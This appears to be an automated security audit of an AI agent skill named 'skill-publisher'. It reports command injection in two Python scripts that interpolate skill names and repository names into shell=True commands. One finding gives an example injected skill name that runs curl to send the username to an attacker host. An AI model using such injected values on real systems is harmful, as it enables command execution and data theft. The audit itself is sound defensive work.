skill-publisher
Fail
Audited by Gen Agent Trust Hub on Mar 25, 2026
Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: Arbitrary command execution vulnerability in
scripts/add_skill.pyvia untrusted data. The script extracts the 'name' and 'description' fields from the YAML frontmatter of a target skill'sSKILL.mdfile. These values are then directly interpolated into shell command strings (e.g.,git add {skill_name}andgit commit -m "添加 {skill_name} skill") which are executed withshell=True. An attacker providing a skill with a name like"myskill; curl http://attacker.com/$(whoami); #"would trigger the execution of the injected command when the publisher skill is used. - [COMMAND_EXECUTION]: Command injection risk in
scripts/init_repo.py. The script accepts a repository name as a command-line argument and interpolates it into a complex shell command for the GitHub CLI (gh repo create {repo_name} ...). Because the script usesshell=True, a malicious repository name could execute arbitrary commands on the host system. - [COMMAND_EXECUTION]: Insecure use of
subprocess.runwithshell=True. Both utility scripts in the skill employ shell execution for standard git and GitHub operations instead of using argument arrays. This practice bypasses shell escaping protections and creates a direct path for command injection when handling any data not strictly controlled by the script itself.
Recommendations
- AI detected serious security threats
Audit Metadata